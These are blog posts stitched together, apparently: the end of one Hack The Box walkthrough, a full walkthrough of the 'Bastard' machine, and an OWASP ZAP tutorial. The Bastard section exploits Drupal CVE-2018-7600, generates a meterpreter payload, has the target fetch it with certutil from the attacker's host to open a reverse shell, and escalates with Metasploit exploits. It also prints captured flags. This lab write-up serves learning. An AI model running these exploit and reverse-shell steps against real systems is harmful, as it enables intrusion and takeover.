[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

msf5 post(multi/recon/local_exploit_suggester) >

This time, we can use the kernel exploit “MS14-070”.

msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_070_tcpip_ioctl 
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
session => 1
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.52.0.73:4444 
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > sessions 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter >

root.txt is in the directory “C:\Documents and Settings\Administrator\Desktop”.

meterpreter > pwd
C:\Documents and Settings\Administrator\Desktop

meterpreter > cat root.txt
9359e905a2c35f861f6a57cecf28bb7b

meterpreter > 

Hackthebox Bastard Walkthrough

placeholder

Retired date: 2017/09/17

Explanation

Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box “Bastard”.

Solution

1. Initial Enumeration

TCP Port Scanning:

root@kali:~# nmap -p- 10.10.10.9 -sC -sV
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-10 17:29 EET
Nmap scan report for 10.10.10.9
Host is up (0.044s latency).
Not shown: 65532 filtered ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 169.57 seconds

root@kali:~#

2. Getting User

By accessing the web server, we can find the website that Drupal CMS is running. placeholder

At first, try to figure out its version, we can see the file “CHANGELOG.txt”.
The version is “Drupal 7.54”

root@kali:~# curl -s http://10.10.10.9/CHANGELOG.txt | head

Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines (API addition:
  https://www.drupal.org/node/2826480).
- Logging of searches can now be disabled (new option in the administrative
  interface).
- Added menu tree render structure to (pre-)process hooks for theme_menu_tree()
  (API addition: https://www.drupal.org/node/2827134).
- Added new function for determining whether an HTTPS request is being served

root@kali:~# 

Since we found the version of Drupal, take a look at public exploit.

root@kali:~# searchsploit drupal 7
------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                               |  Path
                                                                                                             | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------- ----------------------------------------
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution                                                  | exploits/php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection                                                                | exploits/php/webapps/27020.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)                                            | exploits/php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)                                             | exploits/php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)                                  | exploits/php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)                                  | exploits/php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)                                     | exploits/php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities                                                                       | exploits/php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution                                                           | exploits/php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution                                                      | exploits/php/webapps/3313.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities                                                                | exploits/php/webapps/33706.txt
Drupal < 7.34 - Denial of Service                                                                            | exploits/php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                                     | exploits/php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)                                  | exploits/php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                          | exploits/php/webapps/44449.rb
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting                       | exploits/php/webapps/25493.txt
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution                                                | exploits/php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting                                      | exploits/php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload                               | exploits/php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities | exploits/php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)                                            | exploits/php/remote/40130.rb
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure                                            | exploits/php/webapps/44501.txt
------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

root@kali:~# 

By googling the following keyword, we can find the exploit for “CVE-2018-0762”.
At first, we have to install the prerequisites.

root@kali:~# pip install requests

---

root@kali:~# pip install bs4

---

Then, execute the python script like following.
We got RCE and the username is “iusr”

root@kali:~/CVE-2018-7600# python drupa7-CVE-2018-7600.py -c "whoami" http://10.10.10.9
()
=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-zOmyPneEf5iyoz3yKt8zu5m59kxdtrcNPWZ1eaYNM7s
[*] Triggering exploit to execute: whoami
nt authority\iusr

root@kali:~/CVE-2018-7600# 

Next, to obtain a reverse shell, generate a payload with msfvenom.

root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.36 LPORT=1338 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
root@kali:~#

To upload the payload “shell.exe”, run a web server on the localhost.

root@kali:~# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

Next, let the server download our “shell.exe” with the following way.

root@kali:~/CVE-2018-7600# python drupa7-CVE-2018-7600.py -c "certutil.exe -urlcache -split -f http://10.10.14.36:8000/shell.exe shell.exe" http://10.10.10.9
()
=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-eluco1rRs3Likgl6whfexWXJUfBv18WMnuEcvVUc-hw
[*] Triggering exploit to execute: certutil.exe -urlcache -split -f http://10.10.14.36:8000/shell.exe shell.exe
****  Online  ****
  0000  ...
  1c00
CertUtil: -URLCache command completed successfully.

root@kali:~/CVE-2018-7600#

After that, set a handler for the meterpreter shell.

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 10.10.14.36
lhost => 10.10.14.36

msf5 exploit(multi/handler) > set lport 1338
lport => 1338

msf5 exploit(multi/handler) > run

Finally, run the following command to execute the remote “shell.exe”

root@kali:~/CVE-2018-7600# python drupa7-CVE-2018-7600.py -c "shell.exe" http://10.10.10.9
()
=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-3CDbNQWCSlC7U8JT4zNX52Lhbp3Kyc3txDmOtm_2Cxk
[*] Triggering exploit to execute: shell.exe

Now we got a reverse shell as a user “authority\isur”.

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.36:1338 
[*] Sending stage (206403 bytes) to 10.10.10.9
[*] Meterpreter session 1 opened (10.10.14.36:1338 -> 10.10.10.9:49242) at 2020-01-11 00:39:37 +0200

meterpreter > getuid
Server username: NT AUTHORITY\IUSR
meterpreter >

“user.txt” is in the directory “C:\Users\dimitris\Desktop”.

meterpreter > pwd
C:\users\dimitris\desktop

meterpreter > cat ./user.txt
ba22fde1932d06eb76a163d312f921a2

meterpreter >

3. Getting Root

By running “systeminfo”, we can figure out that this server is Windows Server 2008 without any hotfix.
This means that this OS is fresh install and no update was given.

C:\Users\Administrator\Desktop>systeminfo
systeminfo
Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00496-001-0001283-84782
Original Install Date:     18/3/2017, 7:04:46 ��
System Boot Time:          11/1/2020, 1:15:17 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.047 MB
Available Physical Memory: 1.565 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.578 MB
Virtual Memory: In Use:    517 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.9
C:\Users\Administrator\Desktop>

This time, “MS15-051” was used to get a SYSTEM shell.

msf5 exploit(multi/handler) > use exploit/windows/local/ms15_051_client_copy_image 

msf5 exploit(windows/local/ms15_051_client_copy_image) > set session 1
session => 1

msf5 exploit(windows/local/ms15_051_client_copy_image) > set target 1
target => 1

msf5 exploit(windows/local/ms15_051_client_copy_image) > set lhost 10.10.14.36
lhost => 10.10.14.36

msf5 exploit(windows/local/ms15_051_client_copy_image) > run

[*] Started reverse TCP handler on 10.10.14.36:4444 
[*] Launching notepad to host the exploit...
[+] Process 2052 launched.
[*] Reflectively injecting the exploit DLL into 2052...
[*] Injecting exploit into 2052...
[*] Exploit injected. Injecting payload into 2052...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Command shell session 2 opened (10.10.14.36:4444 -> 10.10.10.9:49182) at 2020-01-11 01:17:57 +0200

whoami
whoami
nt authority\system

C:\inetpub\drupal-7.54>

root.txt is in the directory “C:\Users\Administrator\Desktop”.

C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
4bf12b963da1b30cc93496f617f7ba7c

C:\Users\Administrator\Desktop>

Running OWASP ZAP on Kali Linux 2019.4

placeholder

Explanation

OWASP ZAP is a web vulnerability scanner that is one of the OWASP projects.

Environment

  • OS: Kali linux 2019.4
  • OWASP ZAP: v2.8.1
  • Target: OWASP Juice shop v9.3.1

Solution

1. Initial setup

Since it’s in the kali official repository, we need just “apt-get”

root@kali:~# apt-get install zaproxy

Next, launch the target application.
This time, I used OWASP Juice shop with Vagrant and IP “192.168.33.10” was assigned.

root@kali:~# git clone https://github.com/bkimminich/juice-shop.git

---

root@kali:~# cd juice-shop/vagrant/

root@kali:~/juice-shop/vagrant# vagrant up

---

After that give a specific name for OWASP juice shop.
This time, give the following line in “/etc/hosts”.

192.168.33.10 juiceshop

2. Other setup

At first, open the ZAP GUI console. placeholder

Go to “Tools” -> “Options” -> “Local Proxies”.
By default, it is configured to use “http://localhost:8080”.
We have to configure the web browser to use a proxy on port 8080. placeholder

Then, change the mode to the “Protected mode” not to implement unintended attack.
If we select the “Protected mode”, we have to specify the target URL. placeholder

The web browser we use should be Firefox because it does not have any XSS protection.
However, this time, Google Chrome was used.
placeholder

If the configuration is correct, we can find the target URL in the “Site” section.
This means now we can go to the next step. placeholder

Since we’re using protected mode, we have to include the site into the “context”.
We need to right click the site, then go to “Include in Context”.
This time, we don’t have any context so click the “New Context” and we can see this window.
So click “OK”. placeholder

After that, we can see that some entries are added to the site. placeholder

3. Active scanning

Now we have a target machine.
Try to attack by right clicking the “http://juiceshop” -> “Attack” -> “Active Scan”.
We can confirm that tons of HTTP requests were being sent on the “Active Scan” tab. placeholder placeholder

After the finishing, we can find some security alerts on the “Alerts” tab placeholder

4. Saving the session

We can save the session data by going to “Snapshot Session As…”, we cam save the current session. placeholder

5. Generate a report

We can create a report of the each test as HTML or XML file.
Go to “Report” -> “Generate HTML Report…”. placeholder

6. Next task

This time, I could not find some vulnerabilities that OWASP juice shop has.
Next time, try to focus on each vulnerability and by customizing policies, achieve this purpose